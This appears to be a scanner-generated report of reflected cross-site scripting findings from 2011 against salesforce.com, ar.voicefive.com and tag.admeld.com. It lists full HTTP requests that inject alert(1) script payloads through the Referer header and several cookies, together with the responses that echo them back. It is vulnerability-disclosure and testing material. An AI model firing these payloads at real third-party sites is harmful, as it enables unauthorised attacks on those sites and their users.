<ti ...[SNIP]... /&fname=Cloud%20Customer&email=a@a.com&optionaldata2=/cloud_hosting_faq/&optionaldata3=cleanEntry&optionaldata4=&optionaldata5=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f19ca"><script>alert(1)</script>ebca61dd64f&optionaldata6=1ffb86d7e6309d5032693db6bb0255e1','custclient','width=460,height=300,scrollbars=0'); return false;"> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd1a6'-alert(1)-'28e71cbeb8a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servlet/servlet.WebToLead HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bd1a6'-alert(1)-'28e71cbeb8a
Response
HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Sat, 05 Feb 2011 15:52:55 GMT
Connection: close
Content-Length: 498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en ...[SNIP]... <script> if (window.location.replace){ window.location.replace('http://www.google.com/search?hl=en&q=bd1a6'-alert(1)-'28e71cbeb8a'); } else {; window.location.href ='http://www.google.com/search?hl=en&q=bd1a6'-alert(1)-'28e71cbeb8a'; } </script> ...[SNIP]...
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 5bc1b<script>alert(1)</script>deb4f4248f3 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810; BMX_3PC=15bc1b<script>alert(1)</script>deb4f4248f3
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 15:46:51 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 13948
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... ecExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "BMX_3PC": '15bc1b<script>alert(1)</script>deb4f4248f3', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5 ...[SNIP]...
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 94e8f<script>alert(1)</script>636a257fa93 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-129445681094e8f<script>alert(1)</script>636a257fa93
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 15:41:25 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 13931
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... )();}COMSCORE.BMX.Buddy.cookies={ "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "UID": '1d29d89e-72.246.30.75-129445681094e8f<script>alert(1)</script>636a257fa93', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01: ...[SNIP]...
The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload e8790<script>alert(1)</script>682ad76113e was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&e8790<script>alert(1)</script>682ad76113e; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 15:41:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 13931
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... d Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&e8790<script>alert(1)</script>682ad76113e', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:1 ...[SNIP]...
The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload 54c1e<script>alert(1)</script>c25f16d737 was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&54c1e<script>alert(1)</script>c25f16d737; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 15:41:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 13930
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... load); }}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Buddy.cookies={ "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&54c1e<script>alert(1)</script>c25f16d737', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sa ...[SNIP]...
The value of the ar_p68511049 cookie is copied into the HTML document as plain text between tags. The payload d22e2<script>alert(1)</script>4e5992fd5 was submitted in the ar_p68511049 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&d22e2<script>alert(1)</script>4e5992fd5; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 15:41:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 13929
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&d22e2<script>alert(1)</script>4e5992fd5' }; COMSCORE.BMX.Buddy.ServerTimeEpoch="1296920485";COMSCORE.BMX.Buddy.start(({"Config":{"ControlList":[{Pid:"p41327062",RecruitFrequency:0,Inv:"inv_300x250",Version:3}],"MasterSettings":{"ExcludeUrl ...[SNIP]...
The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 2b912<script>alert(1)</script>27c4006c9b3 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&2b912<script>alert(1)</script>27c4006c9b3; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 15:41:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 13931
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&2b912<script>alert(1)</script>27c4006c9b3', "ar_p68511049": 'exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&' }; COMSCORE.BMX.Buddy.ServerTimeEpoch="1296920485";COMSCORE.BMX.Buddy.start(( ...[SNIP]...
The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 6f0a4<script>alert(1)</script>8fdb261c521 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&6f0a4<script>alert(1)</script>8fdb261c521; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 15:41:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 13931
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&6f0a4<script>alert(1)</script>8fdb261c521', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5 ...[SNIP]...
The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 526dd"><script>alert(1)</script>d8ca315aae6 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= HTTP/1.1 Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: D41U=3Nyj5fipbZBWiT7eNY-OMuK0KbpdEAgp0GrH-wWfsMRl3pcGRo-aEow; meld_sess=6acccca4-d0e4-464e-a824-f67cb28d5556526dd"><script>alert(1)</script>d8ca315aae6
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR" Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT X-AdMeld-Debug: Content-Length: 3132 Content-Type: text/html Date: Sat, 05 Feb 2011 15:59:47 GMT Connection: close
The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6daf3"><script>alert(1)</script>154ae141a7e was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= HTTP/1.1 Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: D41U=3Nyj5fipbZBWiT7eNY-OMuK0KbpdEAgp0GrH-wWfsMRl3pcGRo-aEow; meld_sess=6acccca4-d0e4-464e-a824-f67cb28d55566daf3"><script>alert(1)</script>154ae141a7e
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR" Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT X-AdMeld-Debug: Content-Length: 3132 Content-Type: text/html Date: Sat, 05 Feb 2011 15:59:47 GMT Connection: close
The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de34"><script>alert(1)</script>f99e5bb2eec was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
